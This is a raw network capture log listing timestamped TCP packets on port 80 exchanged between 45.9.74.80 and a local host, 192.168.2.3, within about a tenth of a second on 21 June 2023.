Jun 21, 2023 04:27:58.532355070 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.532402992 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.532449961 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.532459021 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.532496929 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.532551050 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.532551050 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.532593966 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.532640934 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.532653093 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.532689095 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.532694101 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.533009052 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.533058882 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.533073902 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.533103943 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.533145905 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.533164024 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.534532070 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.534565926 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.534596920 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.534630060 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.534641981 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.534641981 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.534661055 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.534899950 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.534931898 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.534955978 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.534960985 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.534984112 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.534991980 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.535022974 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.535039902 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.535183907 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.535609007 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.535639048 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.535667896 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.535671949 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.535698891 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.535703897 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.535729885 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.535758972 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.535782099 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.535788059 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.535801888 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.535831928 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.535881042 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.536012888 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.536046028 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.536075115 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.536106110 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.536106110 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.536135912 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.536164999 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.536185980 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.536195040 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.536207914 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.536226988 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.536256075 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.536313057 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.536319017 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.536367893 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.536428928 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.536712885 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.536746979 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.536777020 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.536777973 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.536811113 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.536864042 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.537111044 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.537143946 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.537173986 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.537200928 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.537204027 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.537221909 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.537235975 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.537265062 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.537282944 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.537297010 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.537329912 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.537360907 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.537384033 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.537395954 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.537403107 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.537444115 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.537486076 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.537530899 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.537549973 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.537812948 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.537847042 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.537877083 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.537877083 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.537899971 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.537909031 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.537940025 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.537956953 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.537971973 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.538208008 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.538239002 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.538269043 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.538279057 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.538290024 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.538315058 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.538382053 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.538932085 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.538955927 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.538975954 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.538995981 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.539016008 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.539052963 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.539302111 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.539324045 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.539345026 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.539366007 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.539377928 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.539387941 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.539410114 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.539429903 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.539431095 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.539469004 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.539604902 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.539632082 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.539659977 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.539663076 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.539689064 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.539710999 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.539731026 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.539747000 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.539752960 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.539766073 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.539774895 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.539797068 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.539804935 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.539864063 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.556483984 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.559638023 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.559684992 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.559776068 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.559941053 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.560401917 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.560445070 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.560483932 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.560503006 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.560524940 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.560565948 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.560586929 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.560604095 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.560610056 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.560643911 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.561886072 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.561927080 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.561964989 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.561978102 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.562012911 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.562247992 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.562573910 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.583975077 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.584039927 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.584059000 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.584075928 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.584094048 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.584111929 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.584131002 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.584147930 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.584162951 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.584168911 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.584196091 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.584217072 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.584234953 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.584275961 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.584295034 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.584315062 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.584333897 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.584352016 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.584369898 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.584381104 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.584388971 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.584408045 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.584410906 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.584428072 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.584434986 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.584450006 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.584470034 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.584470034 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.584489107 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.584501982 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.584503889 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.584523916 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.584541082 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.584566116 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.584578991 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.584589005 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.584599018 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.584609032 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.584628105 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.584641933 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.584646940 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.584659100 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.584666014 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.584686041 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.584706068 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.584708929 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.584724903 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.584734917 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.584743977 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.584763050 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.584778070 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.584789038 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.584806919 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.584825993 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.584841967 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.584844112 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.584861994 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.584867001 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.584882021 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.584901094 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.584908962 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.584919930 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.584939003 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.584949017 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.584965944 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.584973097 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.584985971 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.585004091 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.585021019 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.585037947 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.585042000 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.585062027 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.585103989 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.585123062 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.585139990 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.585158110 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.585174084 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.585176945 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.585194111 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.585196018 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.585210085 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.585215092 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.585235119 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.585253000 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.585256100 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.585274935 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.585294962 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.585310936 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.585313082 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.585333109 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.585338116 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.585351944 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.585361958 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.585371971 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.585417032 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.585447073 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.585465908 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.585483074 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.585500956 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.585510015 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.585520029 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.585540056 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.585542917 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.585561991 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.585586071 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.585624933 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.585814953 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.585836887 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.585854053 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.585870981 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.585889101 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.585906982 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.585906982 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.585925102 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.585942030 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.585948944 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.585959911 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.585971117 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.585979939 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.585988998 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.585998058 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.586019993 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.586045027 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.586049080 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.586064100 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.586067915 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.586082935 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.586101055 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.586111069 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.586169958 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.586189032 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.586206913 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.586220980 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.586225033 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.586246014 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.586292982 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.587338924 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.587374926 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.587399960 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.587425947 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.587481022 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.587481022 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.587987900 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.588032961 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.588114977 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.588126898 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.588156939 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.588224888 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.609574080 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.609626055 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.609652042 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.609765053 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.610707045 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.610766888 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.610835075 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.610851049 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.610944033 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.611000061 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.611001015 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.611054897 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.611085892 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.611165047 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.611228943 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.611244917 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.611289024 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.611356020 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.611366034 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.611392975 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.611449957 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.611463070 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.611536980 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.611560106 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.611598969 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.611602068 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.611660957 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.611752033 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.611845016 CEST	80	49719	45.9.74.80	192.168.2.3
